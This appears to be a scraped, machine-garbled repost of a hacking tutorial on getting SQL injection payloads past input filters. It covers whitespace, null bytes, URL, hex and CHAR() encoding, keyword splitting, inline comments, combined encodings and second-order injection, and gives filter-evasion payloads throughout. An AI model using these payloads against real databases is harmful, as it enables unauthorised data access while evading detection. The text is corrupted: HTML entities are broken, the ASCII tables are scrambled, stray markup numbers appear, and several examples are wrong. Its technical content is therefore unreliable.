قالب وردپرس درنا توس
Home / Tips and Tricks / How to find & u Workaround Defense Avoids Null Bytes :: WonderHowTo

How to find & u Workaround Defense Avoids Null Bytes :: WonderHowTo



It is often said that the best hackers remain unknown, and the biggest attacks remain undetected, but it's difficult for an aspiring penetration tester or white hat to learn anything unless one of these factors is actually known or discovered. However, the ultimate goal in our SQL injection lessons is to make that statement as true as possible when we're doing our hacks.

When testing for SQL injection, an attacker often relies on improperly cleaned user input to succeed. But what if everything is filtered properly? There are several ways to work around these defenses by using techniques that abuse certain features of SQL.

Method 1
: White space

The first method we can use to bypass signature recognition uses white space. Adding extra spaces or special characters, such as tabs or new rows, will not affect the SQL statement, but could receive harmful payloads via filters. Example:

  SELECT * FROM user WHERE ID = 1 

This statement is executed in the same way as:

  SELECT * FROM user WHERE ID = 1 

A tab character or a new line also has no effect on the statement :

  SELECT * FROM
User WO
id = 1 

Method 2: Null Bytes

Often, the filter blocks certain characters in the SQL statement. This is probably the most common way to thwart attacks, as without special characters such as apostrophes or strokes, the injection is unlikely to be successful.

One way around this is to use null bytes (% 00) before any blocked characters. For example, if we know that the application blocks apostrophes, the following injection could be used to make the filter admit it:

% 00 & # 39; or 1 = 1 - 

Method 3: URL Encoding

Another way to prevent recognition is URL encoding. This type of encryption is used to send web address information over HTTP over the Internet. Since URLs can only contain ASCII values, all invalid characters must be encoded into valid ASCII characters. URLs can not contain spaces, so they are usually converted to a + or% 20. By masking a malicious SQL query using URL encoding, filters can be bypassed. For example, take the following injection:

  & # 39; or 1 = 1 - 

URL encoding would look like this:

% 27% 20or% 201% 3D1 - 

Method 4: Hex Encoding [19659004] Hex encoding replaces characters in the original SQL statement with the corresponding hexadecimal value. The hexadecimal number system, also referred to as base 16, uses sixteen symbols to represent the values ​​0-15. The numbers 0-9 represent exactly that while A-F represents 10-15.

A compact hex table can be easily obtained by typing man ascii in the terminal and scrolling down a bit:

  tables
For the sake of simplicity, a more compact table is given in hex below.

2 3 4 5 6 7
-------------
0: 0 @ P `p
1:! 1 A Q a q
2: "2 B R b r
3: # 3 C S c s
4: $ 4 D T d t
5:% 5 E u e u
6: & 6 F V f v
7: & 7 G W g w
8: (8H X h x
9 :) 9 I Y i y
A: *: J Z j z
B: +; K [k {
C :, < L  l |
       D: - = M ] m }
       E: . > N ^ n ~
Q: /? O _ o DEL 

This numbering system is widely used in computer engineering and programming because it provides a more readable representation of binary values ​​and can more efficiently represent larger numbers with fewer numbers. Using hexadecimal encoding for SQL statements can often help you avoid detection. For example:

  SELECT * FROM user WHERE name = & # 39; admin & # 39; - 

The hexadecimal equivalent would be:

  SELECT * FROM user WHERE name = 61646D696E - 

Alternatively, we could use the UNHEX () function to get the same results:

  SELECT * FROM user WHERE name = UNHEX (& # 39; 61646D696E & # 39;) - 

Method 5: Character Encoding

Character encoding works much like hexadecimal encoding, replacing characters in the original SQL statement with converted values. This type of encoding uses the CHAR () function to encode characters as decimal values.

As before, a compact decimal table can be accessed by entering man ascii in the terminal:

  tables
For simplicity, a more compact table is shown in decimals below.

30 40 50 60 70 80 90 100 110 120
---------------------------------
0: (2 <  F  P  Z  d   n   x
        1:    )  3  =  G  Q  [  e   o   y
        2:    *  4  > H R  f p z
3:! + 5? I S] g q {
4: ", 6 @ J T ^ hr |
5: # - 7 A K U _ i s}
6: $. 8 B L V `j t ~
7:% / 9 C M W a k u DEL
8: & 0: D N X b l v
9: "1; EOY cmw 

Consider the following query:

  SELECT * FROM user WHERE name = & # 39; admin & # 39; - 

With the character encoding, the statement would look like this: [19659005] SELECT * FROM user WHERE name = CHAR (97,100,109,105,110) –

Method 6: String concatenation

Another method used to work around filters is string concatenation, we have the string concatenation in a previous tutorial but the same concept can be used here, we can often avoid detection by breaking down the keywords in the malicious SQL query Note that string concatenation varies between different database systems. Let's take a look at the following statement:

  SELECT * FROM user WHERE id = 1 

Using string concatenation in MySQL, we can create a query that may handle filters k might:

  CONCAT (# 39; # 39 & SEL ;, & # 39; ECT & # 39; ) * FROM user WHERE ID = 1 

The query in MS SQL would look like this:

  & # 39; SEL & # 39; + & # 39; ECT & # 39; * FROM user WHERE ID = 1 

PostgreSQL:

  "SEL" || # ECT # FROM user WHERE ID = 1 

Oracle (two options):

  CONCAT ('SEL', 'ECT') * FROM User WHERE ID = 1 
  'SEL' # '# ECT # FROM * User WHERE ID = 1 

Method 7: Comments

Misuse of the way SQL handles inline comments can also help bypass filters and prevent detection during SQL injection attacks If there can be any number of comments in a statement and still be valid, we can use them to resolve the query and bypass any existing filters, for example, we can insert comments between keywords as follows:

  SELECT / ** / * / ** / FROM / ** / User / ** / WHERE / ** / name / ** / = / ** / # admin - 

Method 8: Combinations

Sometimes even these techniques of signature avoidance, but we can combine them to improve our chances of successfully avoiding defenses and attacking. Suppose a filter for the application we are attacking does not allow comment marks. To get around this, we can try to create a query that encodes these characters to manipulate the filter to allow it. The original query that fails:

  SELECT / ** / * / ** / FROM / ** / User / ** / WHERE / ** / name / ** / = / ** / & # 39; admin & # 39; - [19659006] The same query that uses URL encoding to mask the comment characters: 

  SELECT% 2F% 2A% 2A% 2F% 2A% 2F% 2A% 2A% 2FFROM% 2F% 2A% 2A% 2FUser % 2F% 2A% 2A% 2FWHERE% 2F% 2A% 2A% 2Fname% 2F% 2A% 2A% 2F% 3D% 2F% 2A% 2A% 2F% E2% 80% 99Admin% E2% 80% 99 - 

Any of these methods can be combined to bypass annoying filters, and as such, significantly increases our chances of success in SQL injection.

Method 9: Second Order Injections

The Last Method We Can Help Bypassing the signature is a bit more complicated, but depending on the configuration of the database, this type of attack can possibly help, if anything else fails.

Second-order SQL injection occurs when a Web application or database correctly filters the input from a user, but does not provide any further sanitization after the initial query has been run and validated. If the application performs another function using the database, our SQL query is executed dynamically and the malicious code is executed. As such, this type of injection can be thought of as having two distinct stages: the initial query that encapsulates the malicious code and another process that executes the code at a later time.

One common mitigation technique is to double each of the single quotation marks that appear in user input before running the query on the database. Let's say we have an application that gives users the ability to create an account and a password reset feature. When we create an account, the SQL query might look like this:

  INSERT INTO user (username, password) VALUES (& # 39; johndoe & # 39; & # 39 ;, & # 39; hunter2 & # 39;) 

This has not caused problems for the database since the single quotes are doubled, it is still a valid statement. Let's assume we want to change our password. The query sent to the database would look like this:

  SELECT password FROM user WHERE username = & # 39; johndoe & # 39; & # 39; 

Because the value for the username stored in the database is the string & # 39; johndoe & # 39 ;, an SQL injection error now exists because the original input is no longer filtered. To exploit this, we just need to register a user name with malicious code, such as:

  UNION ALL SELECT * FROM user WHERE username = & # 39; admin & # 39; - 

The account creation itself is being processed successfully, but if we change the password, the malicious query runs, bypassing the input validation.

Stay tuned for SQL Injection

As you can see, there are many techniques that can be used to bypass filtering and avoid detection during SQL injection. These methods not only increase the likelihood of a successful attack, but can also help fly under the radar, which is generally important in hacking. Now that we've tackled the signing circumvention, it's time to take a look at common defense methods used in the industry.

Cover image by heladodementa / Pixabay; Screenshots of drd_ / zero byte

Source link